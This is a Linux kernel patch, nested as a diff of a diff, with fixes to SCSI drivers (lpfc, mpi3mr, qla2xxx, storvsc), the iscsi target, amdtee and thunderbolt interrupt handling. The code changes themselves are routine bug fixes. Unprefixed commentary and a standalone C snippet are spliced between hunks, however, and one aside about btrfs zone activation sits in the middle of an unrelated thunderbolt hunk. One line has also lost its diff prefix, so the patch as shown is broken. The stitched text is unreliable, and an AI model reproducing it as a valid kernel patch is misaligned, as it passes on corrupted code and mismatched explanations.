+@@ -2495,8 +2495,7 @@ static int interrupt_preinit_v3_hw(struct hisi_hba *hisi_hba)
+ 	hisi_hba->cq_nvecs = vectors - BASE_VECTORS_V3_HW;
+ 	shost->nr_hw_queues = hisi_hba->cq_nvecs;
+ 
+-	devm_add_action(&pdev->dev, hisi_sas_v3_free_vectors, pdev);
+-	return 0;
++	return devm_add_action(&pdev->dev, hisi_sas_v3_free_vectors, pdev);
+ }
+ 
+ static int interrupt_init_v3_hw(struct hisi_hba *hisi_hba)
+diff --git a/drivers/scsi/lpfc/lpfc_init.c b/drivers/scsi/lpfc/lpfc_init.c
+index 25ba20e428255..eeb73da754d0d 100644
+--- a/drivers/scsi/lpfc/lpfc_init.c
++++ b/drivers/scsi/lpfc/lpfc_init.c
+@@ -7235,6 +7235,8 @@ lpfc_sli4_cgn_params_read(struct lpfc_hba *phba)
+ 	/* Find out if the FW has a new set of congestion parameters. */
+ 	len = sizeof(struct lpfc_cgn_param);
+ 	pdata = kzalloc(len, GFP_KERNEL);
++	if (!pdata)
++		return -ENOMEM;
+ 	ret = lpfc_read_object(phba, (char *)LPFC_PORT_CFG_NAME,
+ 			       pdata, len);
+ 
+@@ -12507,7 +12509,7 @@ lpfc_cpu_affinity_check(struct lpfc_hba *phba, int vectors)
+ 					goto found_same;
+ 				new_cpu = cpumask_next(
+ 					new_cpu, cpu_present_mask);
+-				if (new_cpu == nr_cpumask_bits)
++				if (new_cpu >= nr_cpu_ids)
+ 					new_cpu = first_cpu;
+ 			}
+ 			/* At this point, we leave the CPU as unassigned */
+@@ -12521,7 +12523,7 @@ found_same:
+ 			 * selecting the same IRQ.
+ 			 */
+ 			start_cpu = cpumask_next(new_cpu, cpu_present_mask);
+-			if (start_cpu == nr_cpumask_bits)
++			if (start_cpu >= nr_cpu_ids)
+ 				start_cpu = first_cpu;
+ 
+ 			lpfc_printf_log(phba, KERN_INFO, LOG_INIT,
+@@ -12557,7 +12559,7 @@ found_same:
+ 					goto found_any;
+ 				new_cpu = cpumask_next(
+ 					new_cpu, cpu_present_mask);
+-				if (new_cpu == nr_cpumask_bits)
++				if (new_cpu >= nr_cpu_ids)
+ 					new_cpu = first_cpu;
+ 			}
+ 			/* We should never leave an entry unassigned */
+@@ -12575,7 +12577,7 @@ found_any:
+ 			 * selecting the same IRQ.
+ 			 */
+ 			start_cpu = cpumask_next(new_cpu, cpu_present_mask);
+-			if (start_cpu == nr_cpumask_bits)
++			if (start_cpu >= nr_cpu_ids)
+ 				start_cpu = first_cpu;
+ 
+ 			lpfc_printf_log(phba, KERN_INFO, LOG_INIT,
+@@ -12648,7 +12650,7 @@ found_any:
+ 				goto found_hdwq;
+ 			}
+ 			new_cpu = cpumask_next(new_cpu, cpu_present_mask);
+-			if (new_cpu == nr_cpumask_bits)
++			if (new_cpu >= nr_cpu_ids)
+ 				new_cpu = first_cpu;
+ 		}
+ 
+@@ -12663,7 +12665,7 @@ found_any:
+ 				goto found_hdwq;
+ 
+ 			new_cpu = cpumask_next(new_cpu, cpu_present_mask);
+-			if (new_cpu == nr_cpumask_bits)
++			if (new_cpu >= nr_cpu_ids)
+ 				new_cpu = first_cpu;
+ 		}
+ 
+@@ -12674,7 +12676,7 @@ found_any:
+  found_hdwq:
+ 		/* We found an available entry, copy the IRQ info */
+ 		start_cpu = cpumask_next(new_cpu, cpu_present_mask);
+-		if (start_cpu == nr_cpumask_bits)
++		if (start_cpu >= nr_cpu_ids)
+ 			start_cpu = first_cpu;
+ 		cpup->hdwq = new_cpup->hdwq;
+  logit:
+diff --git a/drivers/scsi/lpfc/lpfc_sli.c b/drivers/scsi/lpfc/lpfc_sli.c
+index 55a0d4013439f..c0ddf55676a1f 100644
+--- a/drivers/scsi/lpfc/lpfc_sli.c
++++ b/drivers/scsi/lpfc/lpfc_sli.c
+@@ -21903,20 +21903,20 @@ lpfc_get_io_buf_from_private_pool(struct lpfc_hba *phba,
+ static struct lpfc_io_buf *
+ lpfc_get_io_buf_from_expedite_pool(struct lpfc_hba *phba)
+ {
+-	struct lpfc_io_buf *lpfc_ncmd;
++	struct lpfc_io_buf *lpfc_ncmd = NULL, *iter;
+ 	struct lpfc_io_buf *lpfc_ncmd_next;
+ 	unsigned long iflag;
+ 	struct lpfc_epd_pool *epd_pool;
+ 
+ 	epd_pool = &phba->epd_pool;
+-	lpfc_ncmd = NULL;
+ 
+ 	spin_lock_irqsave(&epd_pool->lock, iflag);
+ 	if (epd_pool->count > 0) {
+-		list_for_each_entry_safe(lpfc_ncmd, lpfc_ncmd_next,
++		list_for_each_entry_safe(iter, lpfc_ncmd_next,
+ 					 &epd_pool->list, list) {
+-			list_del(&lpfc_ncmd->list);
++			list_del(&iter->list);
+ 			epd_pool->count--;
++			lpfc_ncmd = iter;
+ 			break;
+ 		}
+ 	}
+@@ -22113,10 +22113,6 @@ lpfc_read_object(struct lpfc_hba *phba, char *rdobject, uint32_t *datap,
+ 	struct lpfc_dmabuf *pcmd;
+ 	u32 rd_object_name[LPFC_MBX_OBJECT_NAME_LEN_DW] = {0};
+ 
+-	/* sanity check on queue memory */
+-	if (!datap)
+-		return -ENODEV;
+-
+ 	mbox = mempool_alloc(phba->mbox_mem_pool, GFP_KERNEL);
+ 	if (!mbox)
+ 		return -ENOMEM;
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_app.c b/drivers/scsi/mpi3mr/mpi3mr_app.c
+index bff6377023979..d10c6afb7f9cd 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_app.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_app.c
+@@ -886,7 +886,7 @@ static int mpi3mr_build_nvme_prp(struct mpi3mr_ioc *mrioc,
+ 			 * each time through the loop.
+ 			 */
+ 			*prp_entry = cpu_to_le64(dma_addr);
+-			if (*prp1_entry & sgemod_mask) {
++			if (*prp_entry & sgemod_mask) {
+ 				dprint_bsg_err(mrioc,
+ 				    "%s: PRP address collides with SGE modifier\n",
+ 				    __func__);
+@@ -895,7 +895,7 @@ static int mpi3mr_build_nvme_prp(struct mpi3mr_ioc *mrioc,
+ 			*prp_entry &= ~sgemod_mask;
+ 			*prp_entry |= sgemod_val;
+ 			prp_entry++;
+-			prp_entry_dma++;
++			prp_entry_dma += prp_size;
+ 		}
+ 
+ 		/*
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_fw.c b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+index 28fd90c4b62d0..a565817aa56d4 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_fw.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+@@ -1198,7 +1198,7 @@ mpi3mr_revalidate_factsdata(struct mpi3mr_ioc *mrioc)
+  */
+ static int mpi3mr_bring_ioc_ready(struct mpi3mr_ioc *mrioc)
+ {
+-	u32 ioc_config, ioc_status, timeout;
++	u32 ioc_config, ioc_status, timeout, host_diagnostic;
+ 	int retval = 0;
+ 	enum mpi3mr_iocstate ioc_state;
+ 	u64 base_info;
+@@ -1252,6 +1252,23 @@ static int mpi3mr_bring_ioc_ready(struct mpi3mr_ioc *mrioc)
+ 			    retval, mpi3mr_iocstate_name(ioc_state));
+ 	}
+ 	if (ioc_state != MRIOC_STATE_RESET) {
++		if (ioc_state == MRIOC_STATE_FAULT) {
++			timeout = MPI3_SYSIF_DIAG_SAVE_TIMEOUT * 10;
++			mpi3mr_print_fault_info(mrioc);
++			do {
++				host_diagnostic =
++					readl(&mrioc->sysif_regs->host_diagnostic);
++				if (!(host_diagnostic &
++				      MPI3_SYSIF_HOST_DIAG_SAVE_IN_PROGRESS))
++					break;
++				if (!pci_device_is_present(mrioc->pdev)) {
++					mrioc->unrecoverable = 1;
++					ioc_err(mrioc, "controller is not present during bringup\n");
++					goto out_device_not_present;
++				}
++				msleep(100);
++			} while (--timeout);
++		}
+ 		mpi3mr_print_fault_info(mrioc);
+ 		ioc_info(mrioc, "issuing soft reset to bring to reset state\n");
+ 		retval = mpi3mr_issue_reset(mrioc,
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_transport.c b/drivers/scsi/mpi3mr/mpi3mr_transport.c
+index 50263ba4f8428..5748bd9369ff7 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_transport.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_transport.c
+@@ -1549,7 +1549,8 @@ static void mpi3mr_sas_port_remove(struct mpi3mr_ioc *mrioc, u64 sas_address,
+ 
+ 	list_for_each_entry_safe(mr_sas_phy, next_phy,
+ 	    &mr_sas_port->phy_list, port_siblings) {
+-		if ((mrioc->logging_level & MPI3_DEBUG_TRANSPORT_INFO))
++		if ((!mrioc->stop_drv_processing) &&
++		    (mrioc->logging_level & MPI3_DEBUG_TRANSPORT_INFO))
+ 			dev_info(&mr_sas_port->port->dev,
+ 			    "remove: sas_address(0x%016llx), phy(%d)\n",
+ 			    (unsigned long long)
+@@ -2354,15 +2355,16 @@ int mpi3mr_report_tgtdev_to_sas_transport(struct mpi3mr_ioc *mrioc,
+ 	tgtdev->host_exposed = 1;
+ 	if (!mpi3mr_sas_port_add(mrioc, tgtdev->dev_handle,
+ 	    sas_address_parent, hba_port)) {
+-		tgtdev->host_exposed = 0;
+ 		retval = -1;
+-	} else if ((!tgtdev->starget)) {
+-		if (!mrioc->is_driver_loading)
++		} else if ((!tgtdev->starget) && (!mrioc->is_driver_loading)) {
+ 			mpi3mr_sas_port_remove(mrioc, sas_address,
+ 			    sas_address_parent, hba_port);
+-		tgtdev->host_exposed = 0;
+ 		retval = -1;
+ 	}
++	if (retval) {
++		tgtdev->dev_spec.sas_sata_inf.hba_port = NULL;
++		tgtdev->host_exposed = 0;
++	}
+ 	return retval;
+ }
+ 
+@@ -2391,6 +2393,7 @@ void mpi3mr_remove_tgtdev_from_sas_transport(struct mpi3mr_ioc *mrioc,
+ 	mpi3mr_sas_port_remove(mrioc, sas_address, sas_address_parent,
+ 	    hba_port);
+ 	tgtdev->host_exposed = 0;
++	tgtdev->dev_spec.sas_sata_inf.hba_port = NULL;
+ }
+ 
+ /**
+@@ -2447,7 +2450,7 @@ static u8 mpi3mr_get_port_id_by_rphy(struct mpi3mr_ioc *mrioc, struct sas_rphy *
+ 
+ 		tgtdev = __mpi3mr_get_tgtdev_by_addr_and_rphy(mrioc,
+ 			    rphy->identify.sas_address, rphy);
+-		if (tgtdev) {
++		if (tgtdev && tgtdev->dev_spec.sas_sata_inf.hba_port) {
+ 			port_id =
+ 				tgtdev->dev_spec.sas_sata_inf.hba_port->port_id;
+ 			mpi3mr_tgtdev_put(tgtdev);
+diff --git a/drivers/scsi/qla2xxx/qla_gbl.h b/drivers/scsi/qla2xxx/qla_gbl.h
+index e3256e721be14..ee54207fc5319 100644
+--- a/drivers/scsi/qla2xxx/qla_gbl.h
++++ b/drivers/scsi/qla2xxx/qla_gbl.h
+@@ -192,6 +192,7 @@ extern int ql2xsecenable;
+ extern int ql2xenforce_iocb_limit;
+ extern int ql2xabts_wait_nvme;
+ extern u32 ql2xnvme_queues;
++extern int ql2xfc2target;
+ 
+ extern int qla2x00_loop_reset(scsi_qla_host_t *);
+ extern void qla2x00_abort_all_cmds(scsi_qla_host_t *, int);
+diff --git a/drivers/scsi/qla2xxx/qla_init.c b/drivers/scsi/qla2xxx/qla_init.c
+index 8f2a968793913..d506eb3a9b639 100644
+--- a/drivers/scsi/qla2xxx/qla_init.c
++++ b/drivers/scsi/qla2xxx/qla_init.c
+@@ -1841,7 +1841,8 @@ void qla2x00_handle_rscn(scsi_qla_host_t *vha, struct event_arg *ea)
+ 	case RSCN_PORT_ADDR:
+ 		fcport = qla2x00_find_fcport_by_nportid(vha, &ea->id, 1);
+ 		if (fcport) {
+-			if (fcport->flags & FCF_FCP2_DEVICE &&
++			if (ql2xfc2target &&
++			    fcport->flags & FCF_FCP2_DEVICE &&
+ 			    atomic_read(&fcport->state) == FCS_ONLINE) {
+ 				ql_dbg(ql_dbg_disc, vha, 0x2115,
+ 				       "Delaying session delete for FCP2 portid=%06x %8phC ",
+diff --git a/drivers/scsi/qla2xxx/qla_isr.c b/drivers/scsi/qla2xxx/qla_isr.c
+index cbbd7014da939..86928a762a7a6 100644
+--- a/drivers/scsi/qla2xxx/qla_isr.c
++++ b/drivers/scsi/qla2xxx/qla_isr.c
+@@ -1900,6 +1900,8 @@ qla2x00_get_sp_from_handle(scsi_qla_host_t *vha, const char *func,
+ 	}
+ 
+ 	req->outstanding_cmds[index] = NULL;
++
++	qla_put_fw_resources(sp->qpair, &sp->iores);
+ 	return sp;
+ }
+ 
+@@ -3112,7 +3114,6 @@ qla25xx_process_bidir_status_iocb(scsi_qla_host_t *vha, void *pkt,
+ 	}
+ 	bsg_reply->reply_payload_rcv_len = 0;
+ 
+-	qla_put_fw_resources(sp->qpair, &sp->iores);
+ done:
+ 	/* Return the vendor specific reply to API */
+ 	bsg_reply->reply_data.vendor_reply.vendor_rsp[0] = rval;
+diff --git a/drivers/scsi/qla2xxx/qla_os.c b/drivers/scsi/qla2xxx/qla_os.c
+index 2d86f804872bf..02913cc75195b 100644
+--- a/drivers/scsi/qla2xxx/qla_os.c
++++ b/drivers/scsi/qla2xxx/qla_os.c
+@@ -360,6 +360,13 @@ MODULE_PARM_DESC(ql2xnvme_queues,
+ 	"1 - Minimum number of queues supported\n"
+ 	"8 - Default value");
+ 
++int ql2xfc2target = 1;
++module_param(ql2xfc2target, int, 0444);
+MODULE_PARM_DESC(ql2xfc2target,
++		  "Enables FC2 Target support. "
++		  "0 - FC2 Target support is disabled. "
++		  "1 - FC2 Target support is enabled (default).");
++
+ static struct scsi_transport_template *qla2xxx_transport_template = NULL;
+ struct scsi_transport_template *qla2xxx_transport_vport_template = NULL;
+ 
+@@ -1848,6 +1855,17 @@ __qla2x00_abort_all_cmds(struct qla_qpair *qp, int res)
+ 	for (cnt = 1; cnt < req->num_outstanding_cmds; cnt++) {
+ 		sp = req->outstanding_cmds[cnt];
+ 		if (sp) {
++			/*
++			 * perform lockless completion during driver unload
++			 */
++			if (qla2x00_chip_is_down(vha)) {
++				req->outstanding_cmds[cnt] = NULL;
++				spin_unlock_irqrestore(qp->qp_lock_ptr, flags);
++				sp->done(sp, res);
++				spin_lock_irqsave(qp->qp_lock_ptr, flags);
++				continue;
++			}
++
+ 			switch (sp->cmd_type) {
+ 			case TYPE_SRB:
+ 				qla2x00_abort_srb(qp, sp, res, &flags);
+@@ -4075,7 +4093,8 @@ qla2x00_mark_all_devices_lost(scsi_qla_host_t *vha)
+ 	    "Mark all dev lost\n");
+ 
+ 	list_for_each_entry(fcport, &vha->vp_fcports, list) {
+-		if (fcport->loop_id != FC_NO_LOOP_ID &&
++		if (ql2xfc2target &&
++		    fcport->loop_id != FC_NO_LOOP_ID &&
+ 		    (fcport->flags & FCF_FCP2_DEVICE) &&
+ 		    fcport->port_type == FCT_TARGET &&
+ 		    !qla2x00_reset_active(vha)) {
+diff --git a/drivers/scsi/scsi_devinfo.c b/drivers/scsi/scsi_devinfo.c
+index bc9d280417f6a..3fcaf10a9dfe7 100644
+--- a/drivers/scsi/scsi_devinfo.c
++++ b/drivers/scsi/scsi_devinfo.c
+@@ -234,6 +234,7 @@ static struct {
+ 	{"SGI", "RAID5", "*", BLIST_SPARSELUN},
+ 	{"SGI", "TP9100", "*", BLIST_REPORTLUN2},
+ 	{"SGI", "Universal Xport", "*", BLIST_NO_ULD_ATTACH},
++	{"SKhynix", "H28U74301AMR", NULL, BLIST_SKIP_VPD_PAGES},
+ 	{"IBM", "Universal Xport", "*", BLIST_NO_ULD_ATTACH},
+ 	{"SUN", "Universal Xport", "*", BLIST_NO_ULD_ATTACH},
+ 	{"DELL", "Universal Xport", "*", BLIST_NO_ULD_ATTACH},
+diff --git a/drivers/scsi/storvsc_drv.c b/drivers/scsi/storvsc_drv.c
+index 22705eb781b0e..2bf25e80b29a8 100644
+--- a/drivers/scsi/storvsc_drv.c
++++ b/drivers/scsi/storvsc_drv.c
+@@ -987,6 +987,22 @@ static void storvsc_handle_error(struct vmscsi_request *vm_srb,
+ 				goto do_work;
+ 			}
+ 
++			/*
++			 * Check for "Operating parameters have changed"
++			 * due to Hyper-V changing the VHD/VHDX BlockSize
++			 * when adding/removing a differencing disk. This
++			 * causes discard_granularity to change, so do a
++			 * rescan to pick up the new granularity. We don't
++			 * want scsi_report_sense() to output a message
++			 * that a sysadmin wouldn't know what to do with.
++			 */
++			if ((asc == 0x3f) && (ascq != 0x03) &&
++					(ascq != 0x0e)) {
++				process_err_fn = storvsc_device_scan;
++				set_host_byte(scmnd, DID_REQUEUE);
++				goto do_work;
++			}
++
+ 			/*
+ 			 * Otherwise, let upper layer deal with the
+ 			 * error when sense message is present
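An aside on the check above: additional sense code 0x3f means "operating parameters have changed", and qualifiers 0x03 and 0x0e already have dedicated handling earlier in this function, so only the remaining qualifiers fall through to the rescan. A small standalone model of that predicate:

#include <stdbool.h>
#include <stdio.h>

static bool needs_rescan(unsigned char asc, unsigned char ascq)
{
	return asc == 0x3f && ascq != 0x03 && ascq != 0x0e;
}

int main(void)
{
	printf("%d\n", needs_rescan(0x3f, 0x00));	/* 1: rescan */
	printf("%d\n", needs_rescan(0x3f, 0x0e));	/* 0: handled elsewhere */
	printf("%d\n", needs_rescan(0x29, 0x00));	/* 0: different ASC */
	return 0;
}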
+diff --git a/drivers/soc/qcom/llcc-qcom.c b/drivers/soc/qcom/llcc-qcom.c
+index 23ce2f78c4ed4..26efe12012a0d 100644
+--- a/drivers/soc/qcom/llcc-qcom.c
++++ b/drivers/soc/qcom/llcc-qcom.c
+@@ -191,9 +191,9 @@ static const struct llcc_slice_config sc8280xp_data[] = {
+ 	{ LLCC_CVP,      28, 512,  3, 1, 0xfff, 0x0, 0, 0, 0, 1, 0, 0 },
+ 	{ LLCC_APTCM,    30, 1024, 3, 1, 0x0,   0x1, 1, 0, 0, 1, 0, 0 },
+ 	{ LLCC_WRCACHE,  31, 1024, 1, 1, 0xfff, 0x0, 0, 0, 0, 0, 1, 0 },
+-	{ LLCC_CVPFW,    32, 512,  1, 0, 0xfff, 0x0, 0, 0, 0, 1, 0, 0 },
+-	{ LLCC_CPUSS1,   33, 2048, 1, 1, 0xfff, 0x0, 0, 0, 0, 1, 0, 0 },
+-	{ LLCC_CPUHWT,   36, 512,  1, 1, 0xfff, 0x0, 0, 0, 0, 0, 1, 0 },
++	{ LLCC_CVPFW,    17, 512,  1, 0, 0xfff, 0x0, 0, 0, 0, 1, 0, 0 },
++	{ LLCC_CPUSS1,   3, 2048, 1, 1, 0xfff, 0x0, 0, 0, 0, 1, 0, 0 },
++	{ LLCC_CPUHWT,   5, 512,  1, 1, 0xfff, 0x0, 0, 0, 0, 0, 1, 0 },
+ };
+ 
+ static const struct llcc_slice_config sdm845_data[] =  {
+diff --git a/drivers/target/iscsi/iscsi_target_parameters.c b/drivers/target/iscsi/iscsi_target_parameters.c
+index 2317fb077db0e..557516c642c3b 100644
+--- a/drivers/target/iscsi/iscsi_target_parameters.c
++++ b/drivers/target/iscsi/iscsi_target_parameters.c
+@@ -1262,18 +1262,20 @@ static struct iscsi_param *iscsi_check_key(
+ 		return param;
+ 
+ 	if (!(param->phase & phase)) {
+-		pr_err("Key \"%s\" may not be negotiated during ",
+-				param->name);
++		char *phase_name;
++
+ 		switch (phase) {
+ 		case PHASE_SECURITY:
+-			pr_debug("Security phase.\n");
++			phase_name = "Security";
+ 			break;
+ 		case PHASE_OPERATIONAL:
+-			pr_debug("Operational phase.\n");
++			phase_name = "Operational";
+ 			break;
+ 		default:
+-			pr_debug("Unknown phase.\n");
++			phase_name = "Unknown";
+ 		}
++		pr_err("Key \"%s\" may not be negotiated during %s phase.\n",
++				param->name, phase_name);
+ 		return NULL;
+ 	}
+ 
+diff --git a/drivers/tee/amdtee/core.c b/drivers/tee/amdtee/core.c
+index 297dc62bca298..372d64756ed64 100644
+--- a/drivers/tee/amdtee/core.c
++++ b/drivers/tee/amdtee/core.c
+@@ -267,35 +267,34 @@ int amdtee_open_session(struct tee_context *ctx,
+ 		goto out;
+ 	}
+ 
++	/* Open session with loaded TA */
++	handle_open_session(arg, &session_info, param);
++	if (arg->ret != TEEC_SUCCESS) {
++		pr_err("open_session failed %d\n", arg->ret);
++		handle_unload_ta(ta_handle);
++		kref_put(&sess->refcount, destroy_session);
++		goto out;
++	}
++
+ 	/* Find an empty session index for the given TA */
+ 	spin_lock(&sess->lock);
+ 	i = find_first_zero_bit(sess->sess_mask, TEE_NUM_SESSIONS);
+-	if (i < TEE_NUM_SESSIONS)
++	if (i < TEE_NUM_SESSIONS) {
++		sess->session_info[i] = session_info;
++		set_session_id(ta_handle, i, &arg->session);
+ 		set_bit(i, sess->sess_mask);
++	}
+ 	spin_unlock(&sess->lock);
+ 
+ 	if (i >= TEE_NUM_SESSIONS) {
+ 		pr_err("reached maximum session count %d\n", TEE_NUM_SESSIONS);
++		handle_close_session(ta_handle, session_info);
+ 		handle_unload_ta(ta_handle);
+ 		kref_put(&sess->refcount, destroy_session);
+ 		rc = -ENOMEM;
+ 		goto out;
+ 	}
+ 
+-	/* Open session with loaded TA */
+-	handle_open_session(arg, &session_info, param);
+-	if (arg->ret != TEEC_SUCCESS) {
+-		pr_err("open_session failed %d\n", arg->ret);
+-		spin_lock(&sess->lock);
+-		clear_bit(i, sess->sess_mask);
+-		spin_unlock(&sess->lock);
+-		handle_unload_ta(ta_handle);
+-		kref_put(&sess->refcount, destroy_session);
+-		goto out;
+-	}
+-
+-	sess->session_info[i] = session_info;
+-	set_session_id(ta_handle, i, &arg->session);
+ out:
+ 	free_pages((u64)ta, get_order(ta_size));
+ 	return rc;
+diff --git a/drivers/thunderbolt/debugfs.c b/drivers/thunderbolt/debugfs.c
+index 834bcad42e9fe..d89f92032c1c2 100644
+--- a/drivers/thunderbolt/debugfs.c
++++ b/drivers/thunderbolt/debugfs.c
+@@ -942,7 +942,8 @@ static void margining_port_remove(struct tb_port *port)
+ 
+ 	snprintf(dir_name, sizeof(dir_name), "port%d", port->port);
+ 	parent = debugfs_lookup(dir_name, port->sw->debugfs_dir);
+-	debugfs_remove_recursive(debugfs_lookup("margining", parent));
++	if (parent)
++		debugfs_remove_recursive(debugfs_lookup("margining", parent));
+ 
+ 	kfree(port->usb4->margining);
+ 	port->usb4->margining = NULL;
+@@ -967,19 +968,18 @@ static void margining_switch_init(struct tb_switch *sw)
+ 
+ static void margining_switch_remove(struct tb_switch *sw)
+ {
++	struct tb_port *upstream, *downstream;
+ 	struct tb_switch *parent_sw;
+-	struct tb_port *downstream;
+ 	u64 route = tb_route(sw);
+ 
+ 	if (!route)
+ 		return;
+ 
+-	/*
+-	 * Upstream is removed with the router itself but we need to
+-	 * remove the downstream port margining directory.
+-	 */
++	upstream = tb_upstream_port(sw);
+ 	parent_sw = tb_switch_parent(sw);
+ 	downstream = tb_port_at(route, parent_sw);
++
++	margining_port_remove(upstream);
+ 	margining_port_remove(downstream);
+ }
+ 
+diff --git a/drivers/thunderbolt/nhi.c b/drivers/thunderbolt/nhi.c
+index 4dce2edd86ea0..cfebec107f3fc 100644
+--- a/drivers/thunderbolt/nhi.c
++++ b/drivers/thunderbolt/nhi.c
+@@ -46,7 +46,7 @@
+ #define QUIRK_AUTO_CLEAR_INT	BIT(0)
+ #define QUIRK_E2E		BIT(1)
+ 
+-static int ring_interrupt_index(struct tb_ring *ring)
++static int ring_interrupt_index(const struct tb_ring *ring)
+ {
+ 	int bit = ring->hop;
+ 	if (!ring->is_tx)
+@@ -63,13 +63,14 @@ static void ring_interrupt_active(struct tb_ring *ring, bool active)
+ {
+ 	int reg = REG_RING_INTERRUPT_BASE +
+ 		  ring_interrupt_index(ring) / 32 * 4;
+-	int bit = ring_interrupt_index(ring) & 31;
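Aside: the switch above makes activation profile-aware. A "single" block group needs one remaining active zone on the device, while DUP places both copies on the same device and so needs two. A toy model, with invented profile constants standing in for the BTRFS_BLOCK_GROUP_* flags:

#include <stdbool.h>
#include <stdio.h>

enum { PROFILE_SINGLE, PROFILE_DUP };	/* illustrative stand-ins */

static bool can_activate(int profile, int active_zones_left)
{
	switch (profile) {
	case PROFILE_SINGLE:
		return active_zones_left >= 1;
	case PROFILE_DUP:
		return active_zones_left >= 2;	/* two zones, one device */
	}
	return false;
}

int main(void)
{
	printf("single, 1 left: %d\n", can_activate(PROFILE_SINGLE, 1));
	printf("dup,    1 left: %d\n", can_activate(PROFILE_DUP, 1));
	return 0;
}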
+-	int mask = 1 << bit;
++	int interrupt_bit = ring_interrupt_index(ring) & 31;
++	int mask = 1 << interrupt_bit;
+ 	u32 old, new;
+ 
+ 	if (ring->irq > 0) {
+ 		u32 step, shift, ivr, misc;
+ 		void __iomem *ivr_base;
++		int auto_clear_bit;
+ 		int index;
+ 
+ 		if (ring->is_tx)
+@@ -77,18 +78,25 @@ static void ring_interrupt_active(struct tb_ring *ring, bool active)
+ 		else
+ 			index = ring->hop + ring->nhi->hop_count;
+ 
+-		if (ring->nhi->quirks & QUIRK_AUTO_CLEAR_INT) {
+-			/*
+-			 * Ask the hardware to clear interrupt status
+-			 * bits automatically since we already know
+-			 * which interrupt was triggered.
+-			 */
+-			misc = ioread32(ring->nhi->iobase + REG_DMA_MISC);
+-			if (!(misc & REG_DMA_MISC_INT_AUTO_CLEAR)) {
+-				misc |= REG_DMA_MISC_INT_AUTO_CLEAR;
+-				iowrite32(misc, ring->nhi->iobase + REG_DMA_MISC);
+-			}
+-		}
++		/*
++		 * Intel routers support a bit that isn't part of
++		 * the USB4 spec to ask the hardware to clear
++		 * interrupt status bits automatically since
++		 * we already know which interrupt was triggered.
++		 *
++		 * Other routers explicitly disable auto-clear
++		 * to avoid a race where two MSI-X interrupts are
++		 * simultaneously active and reading the register
++		 * clears both of them.
++		 */
++		misc = ioread32(ring->nhi->iobase + REG_DMA_MISC);
++		if (ring->nhi->quirks & QUIRK_AUTO_CLEAR_INT)
++			auto_clear_bit = REG_DMA_MISC_INT_AUTO_CLEAR;
++		else
++			auto_clear_bit = REG_DMA_MISC_DISABLE_AUTO_CLEAR;
++		if (!(misc & auto_clear_bit))
++			iowrite32(misc | auto_clear_bit,
++				  ring->nhi->iobase + REG_DMA_MISC);
+ 
+ 		ivr_base = ring->nhi->iobase + REG_INT_VEC_ALLOC_BASE;
+ 		step = index / REG_INT_VEC_ALLOC_REGS * REG_INT_VEC_ALLOC_BITS;
+@@ -108,7 +116,7 @@ static void ring_interrupt_active(struct tb_ring *ring, bool active)
+ 
+ 	dev_dbg(&ring->nhi->pdev->dev,
+ 		"%s interrupt at register %#x bit %d (%#x -> %#x)\n",
+-		active ? "enabling" : "disabling", reg, bit, old, new);
++		active ? "enabling" : "disabling", reg, interrupt_bit, old, new);
+ 
+ 	if (new == old)
+ 		dev_WARN(&ring->nhi->pdev->dev,
+@@ -393,14 +401,17 @@ EXPORT_SYMBOL_GPL(tb_ring_poll_complete);
+ 
+ static void ring_clear_msix(const struct tb_ring *ring)
+ {
++	int bit;
++
+ 	if (ring->nhi->quirks & QUIRK_AUTO_CLEAR_INT)
+ 		return;
+ 
++	bit = ring_interrupt_index(ring) & 31;
+ 	if (ring->is_tx)
+-		ioread32(ring->nhi->iobase + REG_RING_NOTIFY_BASE);
++		iowrite32(BIT(bit), ring->nhi->iobase + REG_RING_INT_CLEAR);
+ 	else
+-		ioread32(ring->nhi->iobase + REG_RING_NOTIFY_BASE +
+-			 4 * (ring->nhi->hop_count / 32));
++		iowrite32(BIT(bit), ring->nhi->iobase + REG_RING_INT_CLEAR +
++			  4 * (ring->nhi->hop_count / 32));
+ }
+ 
+ static irqreturn_t ring_msix(int irq, void *data)
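Aside: the rewritten branch always programs one of two misc-register bits (BIT(2) to enable auto-clear on parts with the quirk, BIT(17) to disable it elsewhere) and writes the register back only when the chosen bit is not already set. A sketch of that read-modify-write; the quirk flag encoding below is made up, while the bit positions come from the hunk:

#include <stdint.h>
#include <stdio.h>

#define QUIRK_AUTO_CLEAR_INT	0x1u		/* assumed flag encoding */
#define INT_AUTO_CLEAR		(1u << 2)
#define DISABLE_AUTO_CLEAR	(1u << 17)

static uint32_t apply_misc(uint32_t misc, uint32_t quirks)
{
	uint32_t bit = (quirks & QUIRK_AUTO_CLEAR_INT) ?
		       INT_AUTO_CLEAR : DISABLE_AUTO_CLEAR;

	if (!(misc & bit))
		misc |= bit;	/* write back only when needed */
	return misc;
}

int main(void)
{
	printf("%#x\n", apply_misc(0, QUIRK_AUTO_CLEAR_INT));	/* 0x4 */
	printf("%#x\n", apply_misc(0, 0));			/* 0x20000 */
	return 0;
}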
+diff --git a/drivers/thunderbolt/nhi_regs.h b/drivers/thunderbolt/nhi_regs.h
+index 0d4970dcef842..faef165a919cc 100644
+--- a/drivers/thunderbolt/nhi_regs.h
++++ b/drivers/thunderbolt/nhi_regs.h
+@@ -77,12 +77,13 @@ struct ring_desc {
+ 
+ /*
+  * three bitfields: tx, rx, rx overflow
+- * Every bitfield contains one bit for every hop (REG_HOP_COUNT). Registers are
+- * cleared on read. New interrupts are fired only after ALL registers have been
++ * Every bitfield contains one bit for every hop (REG_HOP_COUNT).
++ * New interrupts are fired only after ALL registers have been
+  * read (even those containing only disabled rings).
+  */
+ #define REG_RING_NOTIFY_BASE	0x37800
+ #define RING_NOTIFY_REG_COUNT(nhi) ((31 + 3 * nhi->hop_count) / 32)
++#define REG_RING_INT_CLEAR	0x37808
+ 
+ /*
+  * two bitfields: rx, tx
+@@ -105,6 +106,7 @@ struct ring_desc {
+ 
+ #define REG_DMA_MISC			0x39864
+ #define REG_DMA_MISC_INT_AUTO_CLEAR     BIT(2)
++#define REG_DMA_MISC_DISABLE_AUTO_CLEAR	BIT(17)
+ 
